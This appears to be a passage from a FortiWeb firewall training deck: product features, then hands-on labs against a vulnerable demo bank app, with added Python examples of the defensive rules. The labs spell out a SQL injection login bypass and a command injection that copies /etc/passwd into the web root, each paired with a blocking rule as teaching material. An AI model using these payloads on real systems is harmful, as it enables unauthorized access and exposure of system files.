- Scans and detects web vulnerabilities
- Optimizes application delivery
Web Vulnerability Scanner: scans, analyzes and detects web application vulnerabilities
Application Delivery: assures availability and accelerates performance of critical web applications
FortiGuard Subscription Services
- 100+ threat research professionals
- Eight global locations
- Automated updates to Fortinet customers
FortiWeb Security Service subscription keeps your FortiWeb automatically up to date with:
- Hundreds of application signatures
- Updates with new application signatures, malicious robots, suspicious URL patterns and web vulnerability scanner patterns
FortiWeb Antivirus Service subscription: automated content updates for file upload scanning
Robust 24 x 7 x 365 real-time global intelligence; real-time security protection; globally distributed network
FortiWeb Flexible Deployment Options
Layer II - Transparent Inspection and True Transparent Proxy: easy deployment, no need to re-architect the network, full transparency; fail open interface
Reverse Proxy: supports content modification for both requests and replies from the server; advanced URL rewriting capabilities; HTTPS offloading; enhanced load balancing schemes
Non Inline Deployment (SPAN port): zero network latency; blocking capabilities using TCP resets; ideal for initial product evaluations, non-intrusive network deployment
(Diagram: FortiWeb in front of the web application servers)
High Availability
Active / Passive failover: full configuration synchronization, seamless fail-over, no down time
Configuration Sync: syncs FortiWeb devices across networks; allows managing policies across multiple devices from a central location; seamless integration into already existing HA/LB environments
(Diagram: server farm, FortiWeb, disaster recovery site)
FortiWeb Product Family
FortiWeb-400C: Mid-Enterprise Deployments; 100 Mbps HTTP throughput; 10,000 transactions per second
FortiWeb-1000C: Large Enterprise Deployments; ASIC based acceleration - FortiModule-CP7; 500 Mbps HTTP throughput; 27,000 transactions per second
FortiWeb-3000C/3000CFsx: Large Enterprise / Service Provider Deployments; ASIC based acceleration - FortiModule-CP7; 1 Gbps HTTP throughput; 40,000 transactions per second; hot-swap redundant AC power, 2 x 1 TB storage; 6 x 10/100/1000 copper (+ 2 x Gbps SFP for 3000CFsx)
FortiWeb-4000C: Large Enterprise / Service Provider Deployments; ASIC based acceleration - FortiModule-CP7; hardware based DLP acceleration; 2 Gbps HTTP throughput; 70,000 transactions per second; hot-swap redundant AC power, 2 x 1 TB storage; 6 x 10/100/1000 copper, 2 x Gbps SFP interfaces
FortiWeb-VM
(Diagram: virtualized data center with the FortiWeb virtual appliance between the public zone/DMZ and the private desktops and servers)
Deploy FortiWeb in a virtualized environment
- Mitigates blind spots: protects web applications regardless of connection origin
- Provides visibility to internal connections as well
- Same functionality as the appliance
Minimum requirements for FortiWeb-VM:
- Licenses: 2-vCPU, 4-vCPU, 8-vCPU
- Hypervisor: VMware ESXi/ESX 3.5/4.0/4.1/5.0
- Memory: min. 1024 MB
- CPU: min. 2 virtual CPUs
- 10/100/1000 interfaces: min. 2, max. 4 virtual NICs
- Storage capacity: min. 40 GB
Real Time Dashboard
FortiWeb provides a real time dashboard:
- Traffic monitor per application
- Attack event history per application
- Latest alerts
- Appliance state
Data Analytics: Geo IP Analysis & Security
- Analyzes web app usage based on geographic location and server access
- Dissects traffic based on hit, data and attack type
- Easily block access from a country using right click (map view or list view)
- Provides a graphical interface that helps organizations understand application trends from both a user and a server perspective
FortiAnalyzer Integration
Centralized logging, reporting and analysis for multiple FortiWeb devices
* Starting from FortiAnalyzer MR3
Acceleration
Integrated ASIC based hardware SSL offloading: offloads CPU intensive SSL computing from the server to FortiWeb
- Hardware-based key exchange and bulk encryption
- Purpose built SSL processing
- Full certificate management
- Advanced certificate verification and revocation capabilities
TCP Connection Multiplexing
Data Compression
- Compresses poorly optimised content to minimise impact on network resources and reduce application delivery latency
- Allows efficient bandwidth utilization and response time to users by compressing data retrieved from servers
- Compresses files using gzip
- Compression rate depends on data type and character redundancy
Load Balancing
Intelligent, application aware layer 7 load balancing (support for HTTP/HTTPS only)
- Variety of load balancing algorithms: Round Robin, Weighted Round Robin, Least Connection, HTTP Session Based Round Robin
- Connection persistence: persistence timeout value
- Flexible health checks: physical server monitoring via HTTPS, HTTP, TCP, Ping; content based health checks with regex support
- Web services balancing: WSDL or content routing statements
Advanced Rewriting Capabilities
- Content routing: route traffic based on IP, Host, URL
- Rewriting and redirection capabilities: Host, URL, Referrers
- Rewrite reply content: absolute links, any required content; multiple content types supported
Web Application Scanner
Easily scan your applications for web vulnerabilities
- Common vulnerabilities: SQL Injection, Cross Site Scripting, source code disclosure, OS commanding
- Enhanced/Basic mode
- Authentication options
- Granular crawling capabilities
- Scheduled and on demand scanning
Web Application Scanner
Vulnerability Reports
- Scan summary: vulnerability by severity, vulnerability by category
- Application vulnerabilities, common vulnerabilities
- Server information, crawling information, URLs accepting input, external links
- Email reports automatically
- Updates via FortiGuard
- Complements WAF for PCI DSS 6.6
FortiWeb Auto Learn
Understands application structure
- Models elements from actual traffic
- Builds a baseline based on URLs, parameters, HTTP methods
Automatically understands real behavior
- Can form fields/parameters be modified by users?
- What are the length and type of each form field?
- What characters are acceptable (min, max, average)?
- Is a form field required or optional?
Provides recommendations and graphs
What about those web app dedicated DDoS attacks?
Application based DDoS is on the increase, accounting for a quarter of all DDoS attacks
- Under the radar's bandwidth threshold
- Targeting specific web app/protocol flaws rather than bandwidth consumption: CPU intensive SQL queries to the backend DB, writing to hard disks, server specific
- Slow based and legitimate request attacks: Slowloris sends legitimate, but partial, never ending requests
- Using tools that can be easily downloaded from the internet such as HOIC and LOIC
- Using botnets and automatic tools to reach mass
- Sometimes camouflaging real data breach attempts (SQL Injection primarily)
(Diagram: zombie botnet, many become one)
FortiWeb DoS/DDoS Protection: Application and Network Based
Analyzes requests originating from different users based on different characteristics such as IP and cookie
A sophisticated mechanism understands whether these are real users or automated attacks (HOIC, LOIC tools)
Application layer, 4 different policies:
- HTTP Access Limit - limits the number of HTTP requests per second from a certain IP
- Malicious IPs - limits the number of TCP connections with the same session cookie
- HTTP Flood Prevention - limits the number of HTTP requests per second with the same session cookie
- Real Browser Enforcement - sets the number of HTTP requests per TCP connection, per second, to a specific URL before FortiWeb issues a script to the client to validate whether this is a real browser or an automated tool
Network layer, 2 different policies:
- TCP Flood Prevention - limits the number of TCP connections from the same source IP address
- SYN Cookie - protects against SYN flood attacks
Antivirus File Scanning and File Upload Restriction
- Scan file uploads using Fortinet's antivirus engine
- Regular and extended virus database
- Updates via FortiGuard with the Antivirus service
- Restricts file type uploads
Data Leak Prevention
FortiWeb monitors all outgoing traffic and protects against:
- Information disclosure
- Credit card theft/misuse
Web Site Anti-Defacement
- Monitors application files at specified time intervals
- Upon file change detection: FortiWeb alert
- Automatically restore
FortiWeb provides protection at all layers
Advanced Protection
- Custom Security Policies: custom policies to match on multiple elements (URL, source IP, header type and value, thresholds)
- Antivirus file upload scanning and Data Leak Prevention: scans uploaded files for viruses and malware (FortiGuard updates); detects information disclosure, credit card and PII leakage
- Auto Learn and Validation Rules: deviations from normal user behavior, automated and customer rules
- Application Attack Signatures: detects known application attacks (FortiGuard updates)
- Protocol Validation: validates HTTP RFC compliance
- Application and Network Denial of Service Protection (DoS/DDoS protection): detects and aggregates DoS attacks from multiple vectors
Event/Attack/Traffic Alerts
- Attack alerts: full HTTP request
- Traffic alerts: any access to web applications
- Event alerts: any action on the FortiWeb device
Reports - Attacks
- Out of the box rich and graphical reports
- Custom reports
- Scheduled daily, weekly, monthly or on demand
- PDF, HTML, Word, TXT, MHT formats
Reports - Traffic and Events
Report on any access to the application: application hits, service type usage (HTTP/HTTPS), top sources
Report on any access or change to the FortiWeb device
FortiWeb Value Add
(Diagram: FortiClient desktop; application security: authentication, HTTP compliance, application signatures, auto learn, data leak prevention; application delivery: load balancing and acceleration, compression; vulnerability assessment)
- Dramatically reduce the risk of corporate data loss
- Accurate protection with multiple layers of defense
- Integrated web vulnerability scanner
- Protects against the OWASP Top 10
- Automated management using Auto Learn baselining
- Easily deploys in any environment: multiple deployment options
- Accelerates applications: application aware load balancing, compression, ASIC based SSL acceleration
- Helps achieve PCI compliance
Hands On
How to PoC FortiWeb
Web Protection Profiles
Web Protection Profiles
- Define what to inspect and how to do it
- Are made of different rules, constraints and settings
- Are similar to Protection Profiles in the FortiGate configuration
Creating a new Web Protection Profile
1. Select: Web Protection Profiles > Inline Protection Profile
2. Click Create New
Creating a new Web Protection Profile (2)
1. Name the Web Protection Profile: xbank_web_protection
2. Leave the other fields as default
3. Click OK to save
4. Edit the xbank_web_policy and assign the newly created profile
5. Test accessing the XBANK application
FortiWeb URL Rewriting
FortiWeb URL Rewriting: Discussion
URL Rewriting
Without URL rewriting, when accessing the XBANK application the end user(s) are required to specify /xbank/ in the URL path, due to the existing directory structure.
The URL Rewriting feature removes this requirement.
Added benefit: it transparently hides the internal directory structure from the end user(s).
The URL entered by the end user(s) changes
From:
To:
URL Rewriting > Creating Rewriting Rules
1. Create a new URL Rewriting Rule
2. Click Create New
URL Rewriting > Creating Rewriting Rules (2)
1. Unique Rule Name
2. What to rewrite
3. Where to rewrite
4. Click OK to save
5. Click Create New to define RegEx
URL Rewriting > Define Regular Expression Match
1. Select which object to match
2. Define the pattern match
3. Select the condition of the match
A Note on Regular Expressions
Matching URL paths to a regex provides a concise and flexible means for matching strings of text.
Meta-character - Description
.   Matches any single character
[ ] Matches a single character contained within the brackets
^   Matches the starting position within the string
$   Matches the ending position within the string
*   Matches the preceding element zero or more times
?   Matches the preceding element zero or one time
|   Choice operator: matches either the expression before or the expression after the operator
( ) Memory: expressions between parentheses are captured into a memory position
URL Rewriting > Creating Rewriting Rules (3)
Specify the new URL path to be used to connect to the defined physical server
NOTE: $0 = the first RegEx parameter matched (everything inside the first set of parentheses)
URL Rewriting > Create a new Rewrite Policy
1. Create a new URL Rewriting Policy
2. Click Create New
URL Rewriting > Create a new Rewrite Policy (2)
3. Unique Policy Name
4. Click OK to Save
5. Click Create New to select and prioritize Rewrite Rule(s)
URL Rewriting > Set Rewrite Rule Priority
1. Set Rule Priority
2. Select Rewrite Rule
3. Click OK to Save
NOTES: Priorities determine the execution order of the rewriting rules. Lower priority values are executed before higher priority values (least cost priority executes first).
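As an added example (not code from the training deck or from FortiWeb), the following Python models a rewrite policy with the priority semantics described above and the $0 capture convention from the regex note; the rule names, patterns and the policy itself are constructed for the XBANK lab's /xbank/ directory case.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class RewriteRule:
    """One URL rewriting rule as modelled for this example (constructed, not
    FortiWeb's configuration format): a regex over the request path, a new
    path in which $0 stands for the first parenthesised group, and a priority
    where a lower value executes first."""
    name: str
    pattern: str
    new_path: str
    priority: int


def apply_rule(rule, path):
    """Return the rewritten path if the rule matches, else None."""
    m = re.match(rule.pattern, path)
    if m is None:
        return None
    result = rule.new_path
    # $0 is the first capture group, $1 the second, and so on
    for i, group in enumerate(m.groups()):
        result = result.replace("$%d" % i, group or "")
    return result


def rewrite(policy, path):
    """Evaluate a rewrite policy: rules run in ascending priority order and
    the first rule that matches decides the path sent to the physical server."""
    for rule in sorted(policy, key=lambda r: r.priority):
        new = apply_rule(rule, path)
        if new is not None:
            return rule.name, new
    return None, path


# Constructed policy for the XBANK lab: users type www.xbank.com/... and the
# server-side /xbank/ directory is added transparently.  The pass-through rule
# must run first, otherwise /xbank/ would be prepended twice.
XBANK_POLICY = [
    RewriteRule("xbank-already-prefixed", r"^/xbank/(.*)$", "/xbank/$0", priority=1),
    RewriteRule("xbank-add-prefix", r"^/(.*)$", "/xbank/$0", priority=2),
]

# The same two rules with the priorities swapped, to show why the order matters
MISORDERED_POLICY = [
    RewriteRule("xbank-already-prefixed", r"^/xbank/(.*)$", "/xbank/$0", priority=2),
    RewriteRule("xbank-add-prefix", r"^/(.*)$", "/xbank/$0", priority=1),
]


if __name__ == "__main__":
    for path in ("/", "/login.html", "/xbank/index.php?p=login.html"):
        print(path, "->", rewrite(XBANK_POLICY, path),
              "| misordered:", rewrite(MISORDERED_POLICY, path))
```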
URL Rewriting > Set Rewrite Rule Priority
Final Results
URL Rewriting > Associate Rewrite Policy to Protection Profile
1. Navigate to Web Protection Profile
2. Edit Protection Profile
3. Select rewrite policy & Click OK to save
URL Rewriting > Associate Protection Profile to Server Policy
1. Navigate to Server Policy
2. Edit Server Policy
3. Select Web Protection Profile
URL Rewriting Test Configuration
After creating the URL Rewriting Policy, assigning it to the Web Protection Profile xbank_web_protection and applying the Web Protection Profile to the Server Policy xbank_web_policy:
Test the rewrite by entering www.xbank.com into your browser
Preventing Information Disclosure
Preventing Information Disclosure
Discussion and Lab
Information Disclosure
1. Usually one of the first steps taken by malicious users that will attack a system is gathering information about it: operating system, versions, application types, etc.
2. This gathering process is known as fingerprinting
3. The Server Protection rule Information Disclosure helps prevent the disclosure of this type of information.
Prevent Information Disclosure
1. Point your browser to http://www.xbank.com/xxx.html
2. What did you get as a response? Any problem with it?
3. Sometimes applications give too much information when showing an error.
Prevent Information Disclosure - Configuration
1. Navigate to Server Protection
2. Create a New Policy
Prevent Information Disclosure Configuration (2)
1. Name the Server Protection Policy: Server_Protection-xbank
2. Enable only the Information Disclosure rule
3. Select the Action: Alert & Erase
4. Click OK to save
Prevent Information Disclosure Configuration (3)
Edit the xbank_web_protection and assign the newly created rule:
1. Select New Policy
Test by accessing http://www.xbank.com/xxx.html
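To make the Alert & Erase action concrete, here is an added Python example (not FortiWeb's engine or signature set) that strips fingerprinting headers and the version banner from a constructed 404 page of the kind a stock Apache/PHP server returns for /xxx.html, while recording what would be alerted on; the header names, body patterns and sample response are assumptions for this example.

```python
import re

# Headers and body patterns that fingerprint the server stack.  Constructed for
# this example; not FortiWeb's Information Disclosure signature set.
FINGERPRINT_HEADERS = {"server", "x-powered-by", "x-aspnet-version"}
FINGERPRINT_BODY = [
    # product/version banners such as "Apache/2.2.14 (Ubuntu) Server at ... Port 80"
    re.compile(r"(?:Apache|nginx|Microsoft-IIS|PHP)/\d+(?:\.\d+)*[^<\n]*", re.I),
    # the <address> footer that default Apache error pages carry
    re.compile(r"<address>.*?</address>", re.I | re.S),
]


def alert_and_erase(status, headers, body):
    """Model the 'Alert & Erase' action: return (status, headers, body, alerts)
    with the fingerprinting content removed and one alert record per removal.
    The status code is left alone so the client still sees the real error."""
    alerts = []
    clean_headers = {}
    for name, value in headers.items():
        if name.lower() in FINGERPRINT_HEADERS:
            alerts.append(("header", name, value))
        else:
            clean_headers[name] = value
    clean_body = body
    for pattern in FINGERPRINT_BODY:
        for match in pattern.finditer(clean_body):
            alerts.append(("body", pattern.pattern, match.group(0)))
        clean_body = pattern.sub("", clean_body)
    return status, clean_headers, clean_body, alerts


# Constructed 404 response for http://www.xbank.com/xxx.html (sample data,
# not captured from the lab server)
SAMPLE_404_HEADERS = {
    "Content-Type": "text/html; charset=iso-8859-1",
    "Server": "Apache/2.2.14 (Ubuntu)",
    "X-Powered-By": "PHP/5.3.2",
}
SAMPLE_404_BODY = (
    "<html><body><h1>Not Found</h1>\n"
    "<p>The requested URL /xxx.html was not found on this server.</p>\n"
    "<hr>\n"
    "<address>Apache/2.2.14 (Ubuntu) Server at www.xbank.com Port 80</address>\n"
    "</body></html>\n"
)


def scrub_sample():
    """Run the sample 404 through the Alert & Erase model."""
    return alert_and_erase(404, SAMPLE_404_HEADERS, SAMPLE_404_BODY)


if __name__ == "__main__":
    status, headers, body, alerts = scrub_sample()
    print(status, headers)
    print(body)
    for alert in alerts:
        print("ALERT", alert)
```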
Prevent Information Disclosure Check Attack Log
Cross Site Scripting (XSS)
Preventing Cross Site Scripting (XSS): Discussion and Lab
Cross Site Scripting (XSS)
This is a type of attack in which malicious scripts are injected into trusted sites.
Most of the time the reason a site is vulnerable to this type of attack is that it doesn't do appropriate parameter validation.
It can be used to steal credentials, user and cookie information.
It exploits the fact that the user trusts the site.
Cross Site Scripting (XSS) - An example (index.php)
index.php is a frameset that contains three frames:
- Top: topFrame.html
- Bottom: bottomFrame.html
- Main: gets its content from the p parameter value. By default, parameter p is fed content from login.html
Cross Site Scripting (XSS) - An example (index.php)
Look what happens if you change the value of parameter p to another value? This is just a simple example of XSS!
You don't need to guess what happens when a malicious site is used instead of www.google.com.
Prevent XSS: Parameter Validation > Create Rule
1. Navigate to Parameter Validation Rule
2. Click Create New
Prevent XSS: Parameter Validation > Create Rule (2)
1. Name the Rule: index.php
2. Select Host Status
3. Select Host Name
4. Define the Request URL
5. Select the Action: Alert & Deny
6. Select the Severity: High
7. Click OK to save
8. Click Create New to define the rule match criteria
Prevent XSS: Parameter Validation > Create Rule (3)
1. Parameter Name: p
2. Max Length set to the default value of 0
3. Select Required
4. Select Use Type Check
5. Select Argument Type = Regular Expression
6. Regular Expression = ^login.html$
7. Click OK to save
Rule match: parameter p = login.html
Prevent XSS: Parameter Validation > Create Policy
1. Navigate to Parameter Validation Policy
2. Click Create New
Prevent XSS: Parameter Validation > Apply Policy
1. Apply the Parameter Validation Policy Parameter_Validation_Policy1 to the Inline Protection Profile xbank_web_protection
2. Click OK to save
Prevent XSS: Parameter Validation > Check Attack Log
Navigate to Log & Report > Log Access > Attack and search for the XSS attack you just completed
Prevent SQL Injection
Prevent SQL Injection: Discussion
SQL Injection - An overview of SQL
SQL (Structured Query Language): language for managing data in a DBMS (Database Management System). Commands are grouped in four sets:
1. Data Manipulation Language (DML): SELECT, UPDATE, INSERT, DELETE
2. Data Definition Language (DDL): CREATE, ALTER, DROP
3. Data Control Language (DCL): GRANT, REVOKE
4. Transaction Control Language (TCL): COMMIT, ROLLBACK
A SQL Injection attack is about modifying SQL sentences by inserting special strings in application fields, URLs, hidden fields, etc.
SQL Injection - An overview of SQL DML (2)
Inserting a record in a database (basic):
XBANK_CUSTOMER table columns: customer_id, customer_login, customer_password, customer_fname, customer_lname, customer_email, customer_address, customer_since
Generic form:
  INSERT INTO Table1 (Field1, Field2, ...)
  VALUES (Value1, Value2, ...);
Example:
  INSERT INTO xbank_customer (customer_login, customer_password, customer_fname, customer_lname)
  VALUES ('mylogin', 'abc1234', 'John', 'Anderson');
SQL Injection - An overview of SQL DML (3)
Updating a record in a database (basic):
Generic form:
  UPDATE Table1 SET Field1 = Value1, Field2 = Value2, ...
  WHERE Condition1 [AND|OR] Condition2;
Example (XBANK_CUSTOMER table):
  UPDATE xbank_customer SET customer_login = 'mylogin', customer_password = 'abc1234', customer_fname = 'John', customer_lname = 'Anderson'
  WHERE customer_id = 1;
SQL Injection - An overview of SQL DML (4)
Deleting a record from the database (basic):
Generic form:
  DELETE FROM Table1
  WHERE Condition1 [AND|OR] Condition2;
Example (XBANK_CUSTOMER table):
  DELETE FROM xbank_customer
  WHERE customer_email LIKE '%@company.com' OR customer_login = 'mylogin';
SQL Injection - CHALLENGE: Login to the application
Try to login to the application without using any valid user or password. TIP: You'll have to inject some SQL
SQL Injection - CHALLENGE: Login to the application (2)
By injecting some SQL you can change the conditional part of the query so it's always true. Login: whatever you want. Password: mypassword' or 'a'='a
Take a look at the query executed by the application:
  select customer_id
  from xbank_customer
  where customer_login = 'whatever you want' and
  customer_password = 'mypassword' or 'a'='a';
The part that is after the OR is always true: 'a' is always equal to 'a'
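As an added example (not from the training deck or the XBANK application), the following Python reproduces the login query above against a constructed in-memory copy of xbank_customer, placing the string-concatenated form the slide describes next to a parameterized form that binds the password as data; the table contents are sample data.

```python
import sqlite3


def make_xbank_db():
    """Constructed in-memory stand-in for the XBANK_CUSTOMER table (sample
    data for this example, not the lab's database)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE xbank_customer ("
        " customer_id INTEGER PRIMARY KEY, customer_login TEXT,"
        " customer_password TEXT, customer_fname TEXT, customer_lname TEXT)"
    )
    conn.execute(
        "INSERT INTO xbank_customer VALUES (1, 'mylogin', 'abc1234', 'John', 'Anderson')"
    )
    return conn


def login_concatenated(conn, login, password):
    """The query as the slide shows the XBANK application building it: the
    form values are spliced into the SQL text, so a quote in the password
    ends the literal and the trailing OR becomes part of the WHERE clause."""
    sql = (
        "select customer_id from xbank_customer "
        "where customer_login = '%s' and customer_password = '%s'" % (login, password)
    )
    return conn.execute(sql).fetchone()


def login_parameterized(conn, login, password):
    """Hardened form: placeholders bind the values as data, so the whole
    password string is compared literally and never parsed as SQL."""
    sql = (
        "select customer_id from xbank_customer "
        "where customer_login = ? and customer_password = ?"
    )
    return conn.execute(sql, (login, password)).fetchone()


if __name__ == "__main__":
    db = make_xbank_db()
    payload = "mypassword' or 'a'='a"   # the password used in the challenge
    print("concatenated :", login_concatenated(db, "whatever you want", payload))
    print("parameterized:", login_parameterized(db, "whatever you want", payload))
```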
Prevent SQL Injection: Server Protection > Test Policy
1. Navigate to http://www.xbank.com/index.php?p=login.html and attempt a new SQL injection: login with password = mypassword' or 'a'='a
2. Check to see if your login attempt gets blocked
Prevent SQL Injection: Server Protection > Review Log
Navigate to Log & Report > Log Access > Attack and search for the SQL Injection attack you just completed
Prevent SQL Injection: Summary
1. Instead of using Server Protection signatures, you could also use parameter validation to prevent SQL Injection, like we did in the Cross Site Scripting lab
2. To accomplish this, edit the Server Protection Rule and disable the SQL Injection signatures
3. Go to Parameter Validation > Input Rule and create a new one: Request URL: /verify_admin.php; verify parameters txtUser and txtPassword; enforce a maximum of 8 (eight) alphanumeric characters (use regex [A-Za-z0-9])
4. Assign the new Input Rule to the already applied Parameter Validation Rule
Command Injection - A look at verify_admin.php
The exec( ) function executes an operating system command.
In this case exec( ) is generating log entries for successful and failed logins and is using the variable $log
Command Injection - Executing commands
1. Disable the Parameter Validation rules in xbank_web_protection
2. Since the login field value is being used by the exec( ) command without validating it first, it is possible to inject some commands there. Login: myuser; cat /etc/passwd > salida.txt ; echo   Password: whatever
3. Take a look at the command executed by the application: exec("echo 2011-05-21 15:20:10: User myuser; cat /etc/passwd > salida.txt ; echo logged in failed >> log/logins.txt")
4. You just copied the content of /etc/passwd to a file in the site's root directory, salida.txt
Command Injection - Executing commands (2)
5. Go to the HTTP Server (Linux) and see if the file /var/www/xbank/salida.txt
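The three labs above (the ^login.html$ rule on index.php's p parameter, and the 8-character alphanumeric rule on verify_admin.php's txtUser and txtPassword that the SQL Injection summary proposes) come down to one input-validation check. Here is an added Python example, not FortiWeb's code or configuration, that applies both rules to the requests those labs use, including the injection strings each lab sends; the rule dictionary format and helper names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The two Parameter Validation input rules built in the labs, in a constructed
# dictionary form (not FortiWeb's configuration).  max_length 0 means no
# length limit, the lab's default.  ^login.html$ is copied from the lab as
# written: the unescaped dot matches any character, so a value such as
# loginXhtml would also pass; ^login\.html$ is the stricter form.
INPUT_RULES = {
    "/index.php": {
        "p": {"regex": r"^login.html$", "max_length": 0, "required": True},
    },
    "/verify_admin.php": {
        "txtUser": {"regex": r"^[A-Za-z0-9]+$", "max_length": 8, "required": True},
        "txtPassword": {"regex": r"^[A-Za-z0-9]+$", "max_length": 8, "required": True},
    },
}


def validate_parameters(path, params):
    """Return the list of (parameter, reason) violations for one request;
    an empty list means the request passes the input rule for that path."""
    violations = []
    rule = INPUT_RULES.get(path)
    if rule is None:
        return violations           # no input rule for this URL
    for name, spec in rule.items():
        values = params.get(name, [])
        if not values:
            if spec["required"]:
                violations.append((name, "missing required parameter"))
            continue
        for value in values:
            if spec["max_length"] and len(value) > spec["max_length"]:
                violations.append((name, "exceeds max length"))
            if not re.match(spec["regex"], value):
                violations.append((name, "fails type check"))
    return violations


def check_get(url):
    """Validate the query string of a GET request (the index.php?p=... case)."""
    parts = urlsplit(url)
    return validate_parameters(parts.path, parse_qs(parts.query))


def check_post(path, form):
    """Validate posted form fields (the verify_admin.php login case)."""
    return validate_parameters(path, {k: [v] for k, v in form.items()})


if __name__ == "__main__":
    print(check_get("http://www.xbank.com/index.php?p=login.html"))
    print(check_get("http://www.xbank.com/index.php?p=http://www.google.com/"))
    print(check_post("/verify_admin.php",
                     {"txtUser": "mylogin", "txtPassword": "mypassword' or 'a'='a"}))
    print(check_post("/verify_admin.php",
                     {"txtUser": "myuser; cat /etc/passwd > salida.txt ; echo",
                      "txtPassword": "whatever"}))
```

The same rule rejects the SQL injection and the command injection payloads for two independent reasons, length and character class, so either check alone would already have blocked them.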
Preventing Cross Site Request Forgery (CSRF)
Preventing Cross Site Request Forgery (CSRF): Discussion
CSRF: Attacking www.xbank.com > run attack
Search for the file csrf_page.html in the resource provided and double-click it
CSRF: Attacking www.xbank.com (2)
7. Let's take a look at csrf_page.html
Prevent CSRF: Applying business logic
One way of preventing CSRF is enforcing the session to follow the application logic.
For instance, to perform a withdrawal in www.xbank.com you should first go through:
1. verify_admin.php
2. do_transaction.php
3. save_transaction.php
The Page Access Rule functionality enforces business logic by means of a cookie, FORTIWAFSID
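As an added example (constructed for this page, not FortiWeb's implementation), the following Python models a session-aware page access rule for the withdrawal flow above: each FORTIWAFSID session must reach the three pages in order, and a request that jumps straight to save_transaction.php, the kind of request a forged page would issue, is denied. The cookie value and the scenario sequence are sample data.

```python
import re


class PageAccessEnforcer:
    """Session-aware page access rule, modelled for this example on the slide's
    description (constructed; not FortiWeb's implementation).  Each session,
    identified by the FORTIWAFSID cookie, must reach the pages of a flow in
    the configured order; a request that skips ahead is denied."""

    def __init__(self, ordered_patterns):
        self.steps = [re.compile(p) for p in ordered_patterns]
        self.next_step = {}   # session id -> index of the step allowed next

    def step_of(self, path):
        """Index of the flow step this path belongs to, or None if it is outside the flow."""
        for index, pattern in enumerate(self.steps):
            if pattern.match(path):
                return index
        return None

    def check(self, cookies, path):
        """Return 'allow' or 'deny' for one request and update the session state."""
        step = self.step_of(path)
        if step is None:
            return "allow"            # page is not part of the protected flow
        session_id = cookies.get("FORTIWAFSID")
        if session_id is None:
            return "deny"             # flow pages require a tracked session
        expected = self.next_step.get(session_id, 0)
        if step == 0 or step == expected:
            last = len(self.steps) - 1
            # after the last step the flow must start again from the beginning
            self.next_step[session_id] = 0 if step == last else step + 1
            return "allow"
        return "deny"


# The withdrawal flow of the XBANK lab, as RegEx URL patterns
WITHDRAWAL_FLOW = [
    r"^/verify_admin\.php$",
    r"^/do_transaction\.php$",
    r"^/save_transaction\.php$",
]


def run_scenario():
    """Constructed sequence: a legitimate withdrawal, then a forged request
    that goes straight to the last step of the flow in the same session."""
    enforcer = PageAccessEnforcer(WITHDRAWAL_FLOW)
    cookies = {"FORTIWAFSID": "session-1"}   # sample cookie value
    legit = [
        enforcer.check(cookies, "/verify_admin.php"),
        enforcer.check(cookies, "/do_transaction.php"),
        enforcer.check(cookies, "/save_transaction.php"),
    ]
    forged = enforcer.check(cookies, "/save_transaction.php")
    return legit, forged


if __name__ == "__main__":
    print(run_scenario())
```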
Prevent CSRF: Applying business logic (3)
1. Name Policy: page_access1
2. Click OK to save
3. Click Create New to create a new rule
4. Enable Host Status
5. Select Host from the dropdown
6. Specify Match Type: RegEx
7. Add URL Pattern
8. Click OK to Save
9. Repeat for additional URLs
Prevent CSRF: Applying business logic (3)
Final Results of CSRF Rules Page
Prevent CSRF: Applying business logic (4)
1. Edit xbank_web_protection
2. Enable Session Management
3. Select the recently created page access rule
NOTE: In order to enforce business logic, the FortiWeb must be session aware. That's why it is mandatory to enable session management.
Prevent CSRF: Testing Configuration > Check Balance
1. Log back into www.xbank.com
2. Stay at the account listing page and review the balance
Prevent CSRF: Testing Configuration > Rerun attack
Open your browser cookie viewer and search for the cookie FORTIWAFSID
Double click csrf_page.html
Review your balance
Prevent CSRF: Testing Configuration > Verify No change
Any change?
Prevent CSRF: Testing Configuration > Check Attack Logs
Brute Force Attacks
Brute Force Attacks: Discussion
What is Enable Share IP?
Some source IP addresses represent 1 single computer, but other source IP addresses represent 100 or 1000 computers. This is caused by source hide NAT.
Some FWB policies provide access rate limits. A rate limit applied to 1 computer should be smaller than a rate limit applied to 500 computers. Thus, 2 configuration values.
How does FWB determine that multiple connections originate from more than 1 computer? Instead of only counting hits by source IP, it counts hits by source IP + ID field in the IP header (non-contiguous numbers).
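As an added example (not FortiWeb's algorithm), the following Python shows a per-source rate limiter with the two limits described above, which promotes a source IP to "shared" when consecutive packets from it carry IP ID values that are not contiguous; the jump threshold, the sample addresses and the ID sequences are constructed for this example.

```python
from collections import defaultdict


def ip_id_distance(a, b):
    """Distance between two 16-bit IP header ID values, allowing for wraparound."""
    return min((a - b) % 65536, (b - a) % 65536)


class ShareIPRateLimiter:
    """Hit counter per source IP with two limits, as the slide describes: one
    for a source that is a single computer and a larger one for a source that
    hides many computers behind NAT.  The NAT heuristic is constructed for this
    example (not FortiWeb's algorithm): a host normally increments the IP ID by
    one per packet, so consecutive packets from one source IP whose IDs jump by
    more than max_jump suggest more than one computer."""

    def __init__(self, single_limit, shared_limit, max_jump=64):
        self.single_limit = single_limit
        self.shared_limit = shared_limit
        self.max_jump = max_jump
        self.hits = defaultdict(int)
        self.last_id = {}
        self.shared = set()

    def observe(self, src_ip, ip_id):
        """Record one packet from src_ip carrying IP ID ip_id; return 'allow' or 'block'."""
        previous = self.last_id.get(src_ip)
        if previous is not None and ip_id_distance(ip_id, previous) > self.max_jump:
            self.shared.add(src_ip)
        self.last_id[src_ip] = ip_id
        self.hits[src_ip] += 1
        limit = self.shared_limit if src_ip in self.shared else self.single_limit
        return "block" if self.hits[src_ip] > limit else "allow"


def simulate():
    """Constructed traffic: 12 hits each from a single host and from a NAT
    address whose packets interleave two ID sequences (two hosts behind it)."""
    limiter = ShareIPRateLimiter(single_limit=10, shared_limit=50)
    single = [limiter.observe("192.0.2.10", 1000 + i) for i in range(12)]
    nat_ids = [5000 + i // 2 if i % 2 == 0 else 20000 + i // 2 for i in range(12)]
    nat = [limiter.observe("203.0.113.1", ip_id) for ip_id in nat_ids]
    return single, nat, sorted(limiter.shared)


if __name__ == "__main__":
    single, nat, shared = simulate()
    print("single host :", single)
    print("NAT address :", nat)
    print("shared IPs  :", shared)
```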
Configuring Brute Force Login Rule > Enable Share IP
1. Navigate to Share IP
2. Select Enable Share IP
3. Click Apply to save
Configuring Brute Force Login Rule > Enable Policy
1. Edit Inline Protection Profilexbank_web_protection
2. Select Brute Force Login
